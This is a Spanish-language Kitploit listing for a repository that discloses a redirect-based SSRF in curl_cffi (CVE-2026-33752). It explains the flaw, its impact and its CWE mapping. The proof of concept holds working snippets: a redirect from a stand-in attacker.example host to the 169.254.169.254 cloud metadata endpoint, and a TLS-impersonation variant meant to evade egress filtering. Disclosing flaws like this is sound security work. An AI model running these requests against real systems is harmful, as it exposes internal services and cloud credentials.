Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33752 — Demuestra una vulnerabilidad de SSRF basada en redirección en curl_cffi que permite el acceso a la red interna, con código PoC y análisis de la evasión por suplantación de TLS. | Kitploit
Herramientas/GitHubGitHub/redyank/cve-2026-33752
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubredyank/cve-2026-33752

CVE-2026-33752

Demuestra una vulnerabilidad de SSRF basada en redirección en curl_cffi que permite el acceso a la red interna, con código PoC y análisis de la evasión por suplantación de TLS.

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33752

CVE-2026-33752 (SSRF basado en redirecciones que permite el acceso a la red interna en curl_cffi)

Resumen

curl_cffi no restringe las solicitudes a rangos de IP internos y sigue las redirecciones automáticamente mediante la librería subyacente libcurl.

Debido a esto, una URL controlada por un atacante puede redirigir solicitudes a servicios internos, como los endpoints de metadatos de la nube. Además, la función de suplantación de TLS de curl_cffi puede hacer que estas solicitudes parezcan tráfico legítimo de un navegador, lo que podría eludir ciertos controles de red.

Detalles

El problema proviene de cómo curl_cffi maneja las solicitudes salientes

  • Las URLs proporcionadas por el usuario se pasan directamente a libcurl sin verificar si resuelven a rangos de IP internos (por ejemplo, 127.0.0.1, 169.254.0.0/16).
  • Las redirecciones se siguen automáticamente (CURLOPT_FOLLOWLOCATION = 1) dentro de libcurl.
  • No hay validación de los destinos de redirección en la capa de Python.

Esto significa que, incluso si una aplicación solo permite solicitudes a URLs externas, un atacante puede

  • Proporcionar una URL que apunte a un servidor controlado por el atacante
  • Devolver una respuesta de redirección que apunte a un servicio interno
  • Hacer que curl_cffi siga esa redirección automáticamente

Como resultado, se puede acceder a endpoints internos (como las APIs de metadatos de instancias en la nube).

Además, curl_cffi admite la suplantación de huellas TLS (por ejemplo, impersonate="chrome"). En entornos donde las solicitudes salientes se filtran según la huella TLS, esto puede hacer que dichas solicitudes sean más difíciles de detectar o bloquear.

Este comportamiento es similar a problemas de SSRF basados en redirecciones reportados anteriormente, como CVE-2025-68616, donde las redirecciones permitían el acceso a recursos internos no deseados.

PoC

  1. Solicitud interna directa
root@kitploit:~
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. Redirección a un servicio interno Servidor del atacante:
root@kitploit:~
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

Código de la víctima:

root@kitploit:~
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

Resultado

  • La solicitud inicial va al servidor del atacante
  • Se devuelve la redirección
  • libcurl sigue la redirección automáticamente
  • Se accede al endpoint de metadatos interno
  1. Con suplantación TLS
root@kitploit:~
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

En algunos entornos, esto puede ayudar a que la solicitud eluda los controles de filtrado basados en TLS.

Impacto

Un atacante que pueda controlar la URL solicitada podría:

  • Acceder a servicios de red internos
  • Alcanzar endpoints de metadatos de la nube y recuperar información sensible
  • Eludir ciertos mecanismos de filtrado saliente (según el entorno) Esto corresponde a CWE-918 Server-Side Request Forgery.
Descargar herramienta